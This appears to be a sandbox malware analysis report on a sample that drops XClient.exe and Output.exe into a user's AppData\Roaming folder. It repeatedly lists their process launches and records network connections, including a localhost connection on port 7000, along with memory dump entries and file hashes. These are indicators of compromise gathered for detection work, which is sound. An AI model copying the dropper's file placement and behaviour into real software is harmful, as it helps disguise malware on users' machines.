C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv n1nmVN9oGUygqVrAdI+tJg.0.2
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| N/A | 127.0.0.1:7000 | | tcp |
Files
memory/6060-0-0x00007FF8DB273000-0x00007FF8DB275000-memory.dmp
memory/6060-1-0x0000000000500000-0x0000000000556000-memory.dmp
C:\Users\Admin\AppData\Roaming\XClient.exe
| MD5 | e0918682feb10b28a39a9cfbf4d2d90c |
| SHA1 | c33f8518747e96955387bac3c8299eea24357fe0 |
| SHA256 | 8f7a69675281f0e5f2fd0b43c64434fdb132fdca1eb82cf23aa947f83c833d01 |
| SHA512 | dcb3961832197bf33b4e554a69b95a17c847fccde7211ca96ee0a9ad975a051f93e6f29a3a9525279b2aaf9d6b7208a8ddeb8c1d430e79ddf4155f5629038fa7 |
memory/4140-27-0x00007FF8DB270000-0x00007FF8DBD31000-memory.dmp
memory/5432-30-0x00007FF8DB270000-0x00007FF8DBD31000-memory.dmp
C:\Users\Admin\AppData\Roaming\Output.exe
| MD5 | 3ac2fbaa37549eb0c50eedbca0da41c2 |
| SHA1 | a486d241a02989d2adbff9785c7c39e68a2934af |
| SHA256 | 815021055de7349aafb51c6788bfd8f1a0f9fc242e842d6b8bf639283a4658fd |
| SHA512 | 76ac7165eba850a34e9dd459c538e1e0ceaee09896e711dabc1272c76a0a79b0826124cec4c43d626b390c222367af55b3de452312e51725f994d218cbe0e7f7 |
memory/5432-32-0x00007FF8DB270000-0x00007FF8DBD31000-memory.dmp
memory/5432-26-0x00000000005A0000-0x00000000005E6000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Output.exe.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
memory/4140-21-0x00000000006B0000-0x00000000006C2000-memory.dmp
memory/4140-90-0x00007FF8DB270000-0x00007FF8DBD31000-memory.dmp
memory/4140-94-0x00007FF8DB270000-0x00007FF8DBD31000-memory.dmp
memory/4140-93-0x00007FF8DB270000-0x00007FF8DBD31000-memory.dmp